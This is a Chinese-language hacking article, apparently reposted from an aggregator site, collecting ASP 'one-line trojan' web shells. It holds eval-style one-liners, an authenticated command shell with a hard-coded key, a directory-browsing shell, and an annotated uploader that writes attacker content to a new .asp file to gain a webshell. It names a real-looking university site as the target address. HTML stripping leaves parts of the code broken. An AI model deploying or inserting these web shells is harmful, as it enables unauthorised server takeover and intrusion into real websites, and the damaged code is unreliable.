【入侵技術】 ASP一句話木馬大全

""Then?Execute(Request("MH"))%>

""thensession("MH")=request("MH"):end?if:ifsession("MH")<>""?then?executesession("MH")%>

1asp一句話木馬

一句話木馬 服務器端

帶驗證:

cmd.asp

if?request("authkey")="pic16f873a"?then

%>

end?if

%>

帶驗證 客戶端

cmd.html

Host:

Cmd?:

οnclick="Javascipt:frm.action=document.frm.act.value;

frm.submit();"

type=button?value="Send?Command">

目錄瀏覽

服務器端

if?request("authkey")="pic16f873a"?then

szPara?=?Request.Form("path")

set?shell=server.createobject("shell.application")

set?dir1=shell.namespace(szPara)

set?diritems=dir1.items

for?each?iii?in?diritems

response.write?iii.path?&?"["?&?iii.size&"]
"

next

end?if

%>

客戶端

Host:

Path:

type=button?value="Send?Command">

一句話木馬客戶端源文件：

里面涉及到一些腳本知識，我就只講解一下功能和簡單注釋，不詳細講了，大家只要注意幾個注意點就行了

//"action="后面是需要修改的以asp命名的數據庫的提交地址

//這個標簽的意思是建立一個表單?以post方式提交給連接http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp處理

//這里的value值根據服務端中value而設定

//可以自行修改成相應這里的value值也必須改為p

setlP=server.createObject("Adodb.Stream")//建立流對象，有了對象才可以使用它固有的屬性和方法

lP.Open?//打開

lP.Type=2?//以文本方式

lP.CharSet="gb2312"?//字體標準

lP.writetext?request("joeving")?//取得木馬內容?參數joeving可以自己定義但必須和下面的name=joeving相對應

lP.SaveToFile?server.mappath("wei.asp"),2

//將木馬內容以覆蓋文件的方式寫入wei.asp

//2就是已覆蓋的方式，這里的wei.asp也是可以自己定義的，如定義成1.asp

//但和下面的response.redirect"wei.asp"中wei.asp的保持一致

lP.Close?//關閉對象

set?lP=nothing?//釋放對象

response.redirect?"wei.asp"//轉向生成的wei.asp和上面的wei.asp相對應，也就是你熟悉的asp木馬登陸界面

//這段程序的功能：利用插入到數據庫文件的這段代碼執行第一個textarea中的內容，并將添加的木馬內容寫入和指向wei.asp，這樣就相當于在服務器上建立了個asp木馬文件，這樣就可以取得webshell了

添入生成木馬的內容/textarea>

//這段標簽是你用來添加木馬內容用的

程序的主要框架是

//取得木馬內容并用無組件上傳技術在服務器端創建asp木馬文件并顯示

//添加木馬內容用的

其實都是些很簡單的一些html和asp的知識，大家不妨自己寫個自己的木馬客戶端~~~哈哈

總結

以上是生活随笔為你收集整理的asp一句话html,asp常用的一句话木马大全的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。